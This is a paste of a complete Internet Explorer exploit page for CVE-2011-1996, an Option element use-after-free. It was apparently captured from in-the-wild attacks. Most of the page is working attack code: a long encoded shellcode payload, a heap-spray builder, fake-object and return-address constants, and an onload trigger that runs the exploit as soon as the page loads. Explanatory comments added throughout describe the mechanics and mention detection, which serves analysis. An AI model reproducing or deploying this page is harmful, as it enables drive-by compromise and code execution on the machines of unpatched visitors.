Internet Explorer Option Element Use-After-Free - CVE-2011-1996

eromang Dec 27th, 2012 1,064 Never
  1. <!--
  2. http://eromang.zataz.com
  3.  
  4. Option Element Use-After-Free - CVE-2011-1996
  5.  
  6. Patched in MS11-081 on 11 October 2011
  7. http://technet.microsoft.com/en-us/security/bulletin/ms11-081
  8.  
  9. Found exploited in the wild, based on CLEAN MX evidence dated 2011-10-25
  10. http://support.clean-mx.de/clean-mx/view_evidence?id=1058155&table=viruses
  11. http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=98.126.99.147
  12.  
  13. hb7.in first seen on MALWARE.pl and on jsunpack on 2012-10-24
  14. http://www.malware.pl/report/hb7.in
  15. http://jsunpack.jeek.org/dec/go?report=6a08f0dcd328c71c09beec65da5adc90f1f08cf4
  16. -->
  17.  
  18. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  19. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" id="doctype1">
  20. <html>
  21. <head>
  22. <script type="text/javascript">
  23.  
  /**
   * Encode a 32-bit value as the two UTF-16 code units that, once the string
   * is in memory, form the little-endian dword `dword` (low 16 bits first).
   * @param {number} dword - value to encode; zero-padded to 8 hex digits
   * @returns {string} a 2-unit string (4 bytes of string data)
   * No masking is applied: a value wider than 32 bits keeps its extra digits,
   * and a negative value carries a leading '-', so both produce garbage.
   */
  function int_to_hex(dword)
  {
          var d=Number(dword).toString (16);
          while(d.length<8) d='0'+d;
          // substr(4,8) is the low 4 hex digits, substr(0,4) the high 4;
          // unescape('%uXXXX') turns each group into a single UTF-16 unit.
          return unescape('%u'+d.substr(4,8)+'%u'+d.substr(0,4));
  }; // stray ';' after a function declaration is an empty statement (harmless)
  30.  
  // Implicit global (no `var`): the address the sprayed blocks are expected to
  // occupy. Read again by `heapspray` and by the fake object in exploit().
  spraybase = 0x0a0a0024;
  32.  
  // Encoded payload, decoded by unescape() into a UTF-16 string and appended to
  // every sprayed block by `heapspray += shellcode` below. It is not decoded or
  // analysed here; treat it as opaque malicious data. In this copy the literal
  // is line-wrapped, so as pasted it does not parse as a single string.
  var shellcode = unescape("%u9090%u9090%ucbb5%u7852%u9090%u9090%u11eb%u"+"4a5a%uc933%u8166%uE3c1%u8007%u0a34%ue296%uebfa%ue805%uffea%uffff%u7ef6%u9696%u9696%u17cb%u857b%ud686%u1d96%u1b63%uc310%ud683%uc696%ud67e%u9692%u1b96%ud010%ud683%uc696%ua27e%u9692%u1b96%u3010%ud683%uc696%ube7e%u9692%u1b96%u5910%ud683%uc696%u8a7e%u9692%uc096%u97fc%u3b7e%u9694%uc096%u94fc%u337e%u9694%uc096%u95fc%u0b7e%u9694%uc096%u92fc%u037e%u9694%uc096%uac7e%u9697%ufc96%u6996%ue800%ud683%uf796%uc355%u7a1d%u5215%u1d6a%u9ed3%ud31f%ua56a%ucf56%uaf16%ue296%ud692%u7dd7%u5f61%u9254%uc396%u7a1d%ue369%u7e9e%u694f%u6969%ud397%u1d9e%u9ae3%ueb1d%u699e%u9ae3%u5e7e%u6969%u1d69%u155e%u9757%u3265%u545f%u969e%u1dc3%uc17a%ueb1d%u139e%ue269%u1dbe%u9ac3%u4413%ub7e2%u1dc0%u86e3%u501d%u13d8%u1d56%ue059%ubd9a%ud041%u921c%u1e87%ud797%ue3d8%u1d61%uc851%u5fc9%u9a54%ua596%uc956%u545f%u969a%u1dc3%u1d7a%u9ee3%u101b%u8100%u96d6%u69c6%u1c00%ud683%ufc96%uc6f3%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u6252%ue31d%uf69e%ucb1b%uc56a%ud6fc%uf2fc%u101d%u83db%u96d6%u69c6%u1000%ud683%uf796%u101d%u83db%u96d6%ud31f%u1d62%u9350%u8709%u96d6%ud3bd%u1562%u937e%ud31f%uf66e%u97fc%u081b%u8193%u96d6%u1dc5%udb10%ud683%uc696%uc37e%u6969%uf769%ufcf6%u1b92%u6ed3%u1dc6%udb10%ud683%u1596%u9756%u7ec6%u69a8%u6969%u1bf7%ue810%ud683%ufc96%uc692%u092e%ud687%u9596%u1550%u9556%u7ec6%u69b2%u6969%u545f%u9692%u96fc%u962e%u9696%u6996%u5f46%u9254%uc396%u7a1d%u5215%u1d7a%u9ee3%u92fe%u9697%ufc96%u69d6%u1400%ud683%u1f96%u6ad3%ufec6%u9792%u9696%u0069%u83ec%u96d6%u1bf6%u1a08%ud681%uc596%ue369%u7e6a%u6821%u6969%u69f7%u6ae3%u0069%u83c8%u96d6%u96fc%u96fc%ue369%u1b6a%ub908%ud683%uc596%u96fc%u0069%u8340%u96d6%u569d%u1399%u9662%u9696%u96fc%u96fc%u95fc%u96fc%u95fc%u95fc%ue369%u696a%uf000%ud683%u1f96%u6ed3%ueb15%u966e%u1299%u9644%u9696%u96fc%ue369%u696e%uf400%ud683%u1f96%u62d3%ueb17%uf662%u967c%u9996%u2110%u9696%u1796%u62eb%uc906%u9697%u1599%u963c%u9696%ue369%ufc62%u69d6%u1400%ud683%u1f96%u66d3%ud351%u967a%u9696%ufc96%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0
069%u83f8%u96d6%u569d%ueae2%u1df6%u62db%ud31d%u1c66%u1686%ub254%u6416%u1e4a%ud686%ue3df%uf764%u96fc%u96fc%u96fc%ue369%u696e%u0000%ud683%u1596%u696e%uc4e2%u96fc%ud351%u967a%u9696%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83e4%u96d6%u569d%ua4e2%ue369%u696e%ufc00%ud683%ufe96%u9146%u9696%u0069%u8304%u96d6%ue369%u696a%u1c00%ud683%u1596%u966e%u71e2%u081b%u8134%u96d6%uc6c5%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u4652%ue31d%ufe9a%u9792%u9696%ud6fc%u0069%u8314%u96d6%ud31f%u1b6a%u6ed3%ufec6%u968f%u9694%u96fc%ueb15%u979e%u90e3%u101b%u8348%u96d6%ueb15%u949e%u90e3%u101b%u8361%u96d6%ueb15%u959e%u90e3%u101b%u8081%u96d6%ueb15%u929e%u90e3%u101b%u80a9%u96d6%ufec6%u9694%u1696%u0069%u8339%u96d6%ueb15%u979e%u90e2%ueb15%u949e%u93e3%u1e7f%u9696%u1596%u9eeb%ue395%u9db4%ue356%ufc88%u1b96%uc108%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81e4%u96d6%u69c5%ue000%ud683%u1596%u9eeb%ue392%u9dc0%ue356%ufec4%u96a9%u9699%u96fc%u96fc%u0069%u832d%u96d6%u569d%ua9e2%ub2fc%u081b%u819a%u96d6%uc6c5%u0069%u8329%u96d6%u569d%ubde2%ucb1b%uc546%u97fc%u69c6%u5500%ud683%ufc96%u1b96%ub308%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81a9%u96d6%u69c5%ue000%ud683%u5f96%u9e54%u9d96%ue256%u5f90%u9e54%u7d96%u15f2%u9eeb%ue397%u1b90%uce08%ud680%u1596%u9eeb%ue394%u1b90%u3a08%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u1596%u9eeb%ue397%u1b90%u0708%ud680%u1596%u9eeb%ue394%u1b90%u7208%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u5f96%u9e54%uf696%ue21d%ub2b2%u017e%u9696%ufe96%u473b%ud7a2%u7ec6%u96b7%u9696%u69c0%u1d46%ubd4e%u3a56%u5612%u6de3%u681d%u133b%ue256%uc69c%u7ec5%u9691%u9696%u7d3d%uf767%u9254%uf696%ufa1d%ub2b2%ud31d%u1daa%ubec2%u95ee%u1d43%u8edc%ucc1d%u95b6%u754b%udfdf%ua21d%u951d%ua563%uf669%u401d%u56a5%u4661%u94a4%u9e25%u7e47%u93e5%ub6a3%u2e15%u687b%ue35d%u1665%u96ac%u95e2%u7dd4%u6171%u1f46%ub292%uadf7%ub2ea%ue3be%u1d5c%ub2cc%u4b95%u1df0%udd9a%ucc1d%u958a%u1d4b%u1d92%u5395%u947d%u56bd%ud21f%u8ab2%u54f7%u969e%ua5f6%uf256%ud61d%u13a6%uee5
6%u1d9a%u9ad6%ue61d%u3b8a%ud61d%u7d9e%u1d9f%ua2d6%ud61b%u1dea%uaad6%ud21f%u8ab2%u55f7%ue2fe%ue6e2%ub9ac%u9bb9%uf4fe%ub8a1%uf8ff%uf8b9%ue5b9%uf3b8%uf3ee%ue396%uf3e5%ua5e4%u96a4%u2d94%uf3dd%u9696%u9696%uf3fd%uf8e4%ufaf3%ua4a5%u4896%ub3f9%u8d48%ueb17%u4979%u1fbb%u0b1a%uf4dc%uccfe%u4ef7%u05c2%ue1e1%ud9b7%ud3ba%u0bbe%ubc7f%u1745%u63e7%u55d6%u35c5%u2d15%u5542%u3bef%ua247%u89d7%u5fea%u2c69%u57a0%ud49c%u130b%uef13%ucf29%u3580%u8976%u9697%u9696%uf796%ue0f2%ue6f7%ua5ff%u96a4%uc00f%u5b8f%u9fad%u1e21%u9439%u128e%u3bfa%uddef%u68fc%ubaf7%u6960%u894c%uc391%u5288%u9696%u9696%ue4e3%ufbfa%uf8f9%u8f96%u5542%u9604%u9696%uc596%ud0d9%uc1c2%uc4d7%ucad3%ud7ca%uf8fe%uf7da%ucaf4%uc0ca%udaa5%ue2ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%ufed7%udaf8%uf4f7%ucaca%ua5c0%ua5b6%ua3a0%ud5b6%ufffa%ufff8%u96f5%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uded8%ub6d8%uf9d5%ue6e4%ue4f9%ue2f7%uf9ff%ucaf8%ud8ca%ue0f7%ue4f3%uf7c0%uf5f5%uf8ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uc5d3%ue5c2%uf0f9%ucae2%ud7ca%ucfda%uf5f7%ud196%uf9fa%uf7f4%ucafa%ua5c0%udfda%ud3c2%uedc9%ua5d7%ua6d7%ud3af%ua4d3%ua7bb%ua7d4%ubbd3%ua6a2%ua1a0%ud4bb%ua4a4%ubbd2%ua4a6%uafa0%ua2a7%ud4a0%ua6a7%ua6a6%uc9eb%udad7%u96da%ufad1%uf4f9%ufaf7%uc0ca%udaa5%uc2df%uc9d3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%ud7ed%ud7a5%uafa6%ud3d3%ubba4%ud4a7%ud3a7%ua2bb%ua0a6%ubba1%ua4d4%ud2a4%ua6bb%ua0a4%ua7af%ua0a2%ua7d4%ua6a6%ueba6%ud7c9%udada%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%u2e96%u9696%u9696%u9696%u067f%u0606%u0606%ud796%uda96%ucf96%uf796%uf596%uc996%uc696%ucc96%uc596%ue496%ue096%u9696%u9696%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%ucfd7%uf1d7%uf8f3%ub8e2%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%udad7%uf7cf%ub8f5%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%uc0d8%ud7d5%uf3f1%ue2f8%uf8b8%uf5e6%uf896%ue5e2%ub6f2%uf5bb%ue7b6%ubbb6%uf8e6%ud8b6%uf7e5%ue5e0%uf5e0%uf8b8%uf5e6%uc096%udac5%ueff7%uf2b8%ufafa%uc596%uf2fe%uf5f9%ue1e0%uf2b8%ufafa%uff96%ufff8%u96e2%uc5b2%uf3fe%ufafa%
uf9d5%uf3f2%uc2c9%uf3fe%uf8d3%ub2f2%u3a2e%u9691%uc696%u967e%u9696%u6996%u96b3%ud6b6%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u96");
  34.  
  // Contents placed at the start of every sprayed block. Because int_to_hex()
  // yields little-endian dwords, the string's in-memory image is:
  //   - a run of fixed 0x78xxxxxx / 0x7Cxxxxxx constants interleaved with
  //     spraybase-relative values (presumably module addresses that are only
  //     valid when those modules load at fixed addresses — not verifiable here),
  //   - 'AA' padding up to exactly 0x1F8 bytes,
  //   - one more dword at byte offset 0x1F8 (labelled a virtual function by the
  //     original author), immediately followed by the encoded payload.
  // Detection-wise, the int_to_hex()/'AA'-padding/`+= shellcode` pattern is
  // the recognisable heap-spray construction; the underlying flaw is closed by
  // the MS11-081 update cited in the file header.
  var heapspray =
  int_to_hex(0x785863F6)
  + int_to_hex(0x7854F203)
  + int_to_hex(0x7C7D1AD4)
  + int_to_hex(0x785863F6)
  + int_to_hex(0x78590ABC)
  + int_to_hex(spraybase)
  + int_to_hex(0x3000)
  + int_to_hex(0x40)
  + int_to_hex(spraybase)
  + int_to_hex(0x7854F203)
  + int_to_hex(0x0a0a0220)
  + int_to_hex(0x78590ABC)
  + '11'
  ;

  // spraybase + 0x1F8 + 4 is the byte offset at which `shellcode` gets appended
  // below — i.e. it points at the payload if a block lands exactly at spraybase.
  heapspray += int_to_hex(spraybase + 0x1F8 +4);

  // Pad to 0x1F8/2 = 252 UTF-16 units (0x1F8 bytes). Each pass appends 2 units
  // and the running length is always even, so the loop stops at exactly 252.
  while (heapspray.length < 0x1F8/2)
  {
          heapspray += 'AA';
  }

  heapspray += int_to_hex(0x63f0575b); // virtual function 63f0575b

  heapspray += shellcode;
  61.  
  /**
   * Build one spray unit: `s`, then "11" filler, then an "AA" end tag, sized so
   * the string data of each block is exactly 0x10000 bytes; eight such blocks
   * are concatenated and trimmed to (0x80000 - 0x28) bytes.
   * @param {string} s - string placed at the start of every 0x10000-byte block
   * @returns {string} (0x80000 - 0x28) / 2 UTF-16 units
   * Unit mix-up to keep in mind when reading: `len` is in bytes (s.length * 2),
   * whereas `b.length` and the substring indices are UTF-16 units, hence
   * `len / 2`. There is no check that `s` fits: if s.length * 2 + 4 exceeds
   * 0x10000, `len` is negative, the doubling loop never runs and the filler is
   * empty, so the block size guarantee silently breaks.
   */
  function build_block(s)
  {
          var endtag = unescape("AA"); // unescape() of plain ASCII is a no-op

          var len = 0x10000 - (s.length *2 + endtag.length * 2);
          var b = "11";
          while(b.length < len) b += b; // doubling: ends with >= len units
          var block = b.substring(0, len / 2);
          block = s + block + endtag;   // s.length + len/2 + 2 units = 0x8000 units

          var bigblock = "";
          for (var i=0; i < 8; i++) bigblock += block;
          // 0x28 bytes are shaved off — presumably to leave room for the
          // allocator/string header within a 0x80000-byte allocation; TODO confirm
          bigblock = bigblock.substring(0, (0x80000-0x28)/2);
         
          return bigblock  // missing ';' — relies on automatic semicolon insertion
  }
  78.  
  79.  
  // The spray itself: 400 copies of bigblock kept alive in `blocks`.
  // `bigblock` is an implicit global (no `var`).
  bigblock = build_block(heapspray);
  var blocks = new Array();
  for(var i = 0; i < 2 * 200; i++)
          // [x].join("") produces a fresh string rather than one more reference
          // to bigblock — presumably to force a distinct allocation per element.
          blocks[i] = [bigblock].join("");
  84.  
  /**
   * Trigger routine, invoked from <body onload>. Builds a fake-object image,
   * allocates a large pool of <img> elements, then twice runs the
   * add-options / replace-via-innerText / form.reset() sequence against
   * #select1. That sequence is the use-after-free pattern of CVE-2011-1996
   * (fixed by MS11-081, cited in the file header); which object is freed and
   * how reset() reaches it are not determinable from this page alone.
   * Side effects: creates the implicit global `bigarray` (no `var`), mutates
   * the #select1 element and its form, and reads the global `spraybase`.
   * All `var i` declarations below are hoisted to one function-scoped variable.
   */
  function exploit()
  {
          // Fake-object image: spraybase (the sprayed address) and a few fixed
          // 0x63f0xxxx constants, padded with 0x0c0c0c0c dwords. Only the first
          // 27 UTF-16 units are ever used (see the title assignment below).
          var fakeobj = int_to_hex(spraybase) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x63f01e13) +
          int_to_hex(0x63F01100) +
          int_to_hex(0x63f01ec4) +
          int_to_hex(spraybase) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          unescape("%u0c0c%u3b3b") +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          int_to_hex(0x0c0c0c0c) +
          unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");

          var formobj, selobj, optobj;
          selobj = document.getElementById("select1");
          formobj = selobj.form;

          var loopcount = 2;
          bigarray = new Array(); // implicit global
          // loopcount arrays of 500 <img> elements; their `title` strings are
          // assigned below, presumably to reoccupy freed memory — TODO confirm.
          for (var i=0; i<loopcount; i++)
          {
                  var imgarray = new Array();
                  for(var j = 0; j < 500; j++) {
                          imgarray.push(document.createElement("img"));
                  }

                  bigarray.push(imgarray);
          }

          for (var k=0; k<loopcount; k++)
          {
                  // 1. add five <option> children to the select
                  for(var i=0;i<5;i++) {
                          optobj = document.createElement('option');
                          optobj.text = "test";
                          selobj.add(optobj);
                  }

                  // 2. assigning innerText replaces the select's children, so
                  //    the options just added are discarded
                  selobj.innerText = "foo";

                  // 3. each <img> title receives the first 0x38/2 - 1 = 27 UTF-16
                  //    units (54 bytes) of the fake-object image
                  for(var i = 0; i < bigarray[k].length; i++) {
                          bigarray[k][i].title = fakeobj.substring(0, 0x38 / 2 - 1);
                  }
                   
                  // 4. resetting the form re-touches the select's option state;
                  //    presumably where stale option data is dereferenced
                  formobj.reset();
          }
  alert('s'); // left-in alert; fires after both iterations
  }
  141.  
  142. </script>
  143. </head>
  144.  
  <!-- Document body: exploit() runs on load against the <select id="select1">
       inside the form below (the script reads it by id and uses its .form).
       The <object> element references a control by classid and is never
       closed; what it loads cannot be determined from this page. -->
  <body onload='exploit()'>
  <form method="post">
     <select id="select1">
  </select>
  </form>
  <object classid="vvv.dll#GenericControl">
  </body>
  </html>